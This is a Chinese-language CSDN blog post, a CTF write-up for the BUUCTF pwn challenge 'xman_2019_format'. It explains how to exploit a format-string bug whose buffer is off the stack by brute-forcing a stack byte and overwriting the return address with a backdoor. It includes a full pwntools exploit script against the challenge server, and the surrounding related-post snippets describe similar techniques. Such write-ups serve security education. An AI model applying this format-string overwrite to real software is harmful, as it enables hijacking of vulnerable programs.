xman_2019_format(非栈上格式化字符串仅一次利用的爆破)

最新推荐文章于 2024-02-26 19:00:35 发布
最新推荐文章于 2024-02-26 19:00:35 发布
阅读量1.4k 收藏 3
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105861452
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

xman_2019_format

首先检查一下程序的保护机制

然后用IDA分析一下

存在一个后门函数

s执行的内存是非栈上,这类格式化字符串漏洞,一般需要先泄露栈地址,但是这里无法做到,如果泄露了,第二次也没机会来再次利用了。因为这里是一次输入,分步执行。没有循环的交互。因此,最简单的方法是爆破栈的低1字节。通过栈上已有的数据,在栈上布下一个指向函数返回地址栈的指针,然后劫持返回地址栈。

#coding:utf8
from pwn import *

#sh = process('./xman_2019_format')
sh = remote('node3.buuoj.cn',27216)
elf = ELF('./xman_2019_format')
backdoor = 0x080485AB
#假设$14栈的数据低一字节为0x98,则爆破,成功率1/16,实际上几率更高
stack_guess = 0x98

#修改$18为$30-0x4C,也就是函数返回地址值
payload = '%' + str(stack_guess-0x4C) + 'c%10$hhn|'
#在栈上$31布置printf的got低2字节地址
payload += '%' + str(backdoor & 0xFFFF) + 'c%18$hn|'
sh.sendafter('...',payload)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
非栈上的格式化字符串漏洞利用
qq_52877079的博客
03-25 370
对于常规的栈上格式化字符串漏洞,可以直接构造(%c %n 指针)的方式来实现任意地址写,但是对于非栈上变量来说,就无法直接给出目的地址的指针,因为printf的参数保存在寄存器和栈上面。对于非栈上变量,格式化字符串漏洞依然存在,可以考虑借助已有的栈上指针来实现间接地利用
第四届Xman个人排位赛流量分析之strange_ssid复现
12-29
第四届Xman个人排位赛流量分析之strange_ssid复现 查找SSID找到一个md5,爆破之,得flag{n3k0}
xman_2019_format非栈格式化字符串一次利用爆破
m0_51251108的博客
11-10 652
xman_2019_format: 看名字是格式化字符串 checksec一下 在printf处 程序分析: 有个后门 想着就是把printf,劫持为后门
非栈上的格式化字符串漏洞
Grxer的博客
03-20 786
利用1处栈地址,也就是将0xffffcfa8地址处内容0xffffcfb8修改为0xffffcfac,由于开启pie保护,0xffffcfac处所存内容是elf文件所存地址+pie基址生成的,got表也在elf文件的数据区,也是有地址+pie基地址生成,所以我们只需要利用%$hn修改其低四位即可(小端序),buf地址可以利用%$p泄露,这样我们就可以输入buf为printf_got+payload,修改其got为system地址。(目标文件该节在磁盘不占空间,在运行时,内存分配,初始化0))
[BUUCTF-pwn]——xman_2019_format
Y_peak的博客
03-30 525
[BUUCTF-pwn]——xman_2019_format 本小白终于想明白了, 第一个写出来这道题的人, 好厉害感觉. 脑袋嗡嗡的, 这道题让我想了一个上午竟然, 果然适当睡眠有助于思考, 睡一觉就想出来了. 也看过几个题解不过,虽然解法相同,但是基本都木有将清楚, 每一步的原因是什么都木有说清楚. peak不才, 在这里试着详细说明一下, 毕竟想了一个上午的东西,还是有必要好好总结一下的 . peak小知识 ALSR : 你们肯定都知道,不就是地址随机化嘛有什么, 但是这道题如果你们不清楚具体的原理
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 609
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
Unicode-XMan.rar_beta
09-24
**Unicode-XMan.rar_beta** 是一个压缩包,包含 **Unicode XMan Version 1.0 Beta (20090910)** 的资源,主要用于查看和理解Unicode字符。这个工具是一个早期的测试版本,发布于2009年9月10日,旨在帮助用户探索...
taobao_cookieman:定时登陆淘宝获取有效cookie
07-05
taobao_cookieman ...文件: login_robot.py 提供Restful服务 template/login-cfg.ctp 配置模板基本不用更改 template/platform_login.ctp 爬虫脚本模板,通过配置后生成 ${店铺名}_login.js 爬虫文件 ...
Xman非常好用
07-30
Xman:一款高效实用的软件工具》 Xman,这款被誉为“非常好用”的软件工具,无疑在IT领域中占据了一席之地。它以其强大的功能和便捷的操作性赢得了用户的广泛赞誉。然而,作为一位负责任的IT专业人士,我们需要...
x_code:二维码生成工具
05-01
x_code二维码生成工具 (兼容PC和移动端 table & canvas)Nmae : qrcode.min.jsDes:把字符串转化为二维码,支持中文,英文和符号转化. 使用方法: xMan_qrcode(options) 返回 table 或者 canvas options{ text 转二维码的...
非栈格式化字符串漏洞
2302_79813730的博客
02-21 934
如图,红色框为a-b-c,我们可以利用格式化字符串漏洞更改c为蓝色框的第一个地址,这样我们就得到a-b-c-d,有这个我们一定可以找到b-c-d,这样我们就可以把d改成one_gadget的地址,d正好是main函数的返回地址,我们一般修改的也是这个。但这样实际是行不通的,通过调试我们可以看到三次更改的都是尾字节,为什么呢,原因就在于非栈上,每一次更改都要有对应的返回地址,这是第一次的,第二次要修改的是中间两字节,在原本基础上+2就可以了,第三次原理相似(想学堆上的可以自己去搜索,我目前也没学到。
不满6位补零 字符串_非栈格式化字符串漏洞利用技巧
weixin_39617669的博客
12-25 260
0x00前言关于Linux栈上格式化字符串漏洞利用网上已经有许多讲解了,但是非栈上的格式化字符串漏洞很少有人介绍。这里主要以上周末SUCTF比赛中playfmt题目为例,详细介绍一下bss段上或堆上的格式化字符串利用技巧。0x01基础知识点格式化字符串漏洞的具体原理就不再详细叙述,这里主要简单介绍一下格式化参数位置的计算和漏洞利用时常用的格式字符。参数位置计算linux下32位程序是栈传参,从左...
非栈上的格式化字符串利用例题讲解
fzucaicai的博客
03-06 747
具体来说,就是用%n,把如图的0x7fffffffdda0所指向的0x7fffffffddb0改成0xfffffffdd98,这样的话,我们用%n作用在第八个参数就可以修改第七个参数所储存的内容了!%n 和 %s一样,都是类似于指针的东西,比如我对第7个参数进行%n ,那么实际上修改的并不是第七个参数里的数据,而是把第七个参数里存的数据当成。改got只能一次成型,因为如果分多次,导致printf的got表改变,就不会再执行pirntf函数了,因此需要一次性修改,否则将会失败。,然后修改指针指向的对应内容。
xman_2019_format
z1r0的博客
02-16 331
xman_2019_format 查看保护 一层一层的跟进之后可以看见有两个格式化的功能。中间使用|来隔开 还有个比较关键的是格式化在堆上,并不在栈上所以平时的的栈上格化式没有什么用。 正常的方法的话没有用,这时可以借助ebp两个链子来改ret为backdoor 因为返回地址的指针的最后一为是0xc所以把ebp第一个链子最低的一个字节改成0xcc,偏移为10。 为什么要改为0xcc呢,可以看一下笔者这里的栈图,返回地址前面是d3cc,而第一个ebp链子是d3a8往后。这里的话其实得要进行爆破,因为栈
BUU_SWPUCTF_2019_login非栈格式化字符串
qq_70452545的博客
04-21 224
对于栈上的格式化字符串可以通过直接将对应地址写入栈中,然后利用三链对任意写入地址修改,非栈上也就是不能直接写入,利用格式化字符串一样可以修改,只是要麻烦一点。
[CTF]PWN--非栈格式化字符串漏洞
最新发布
2301_79880752的博客
02-26 2073
一般来说,栈上的格式化字符串漏洞利用步骤是先泄露地址,包括ELF程序地址和libc地址;然后将需要改写的GOT表地址直接传到栈上,同时利用%c%n的方法改写入地址,最后就是劫持流程。但是对于BSS段或是堆上格式化字符串,也就是非栈格式化字符串漏洞,无法直接将想要改写的地址指针放置在栈上,也就没办法实现任意地址写。本文主要为大家介绍BSS段上的格式化字符串漏洞的解法。
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编写的,XMAN 变量可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值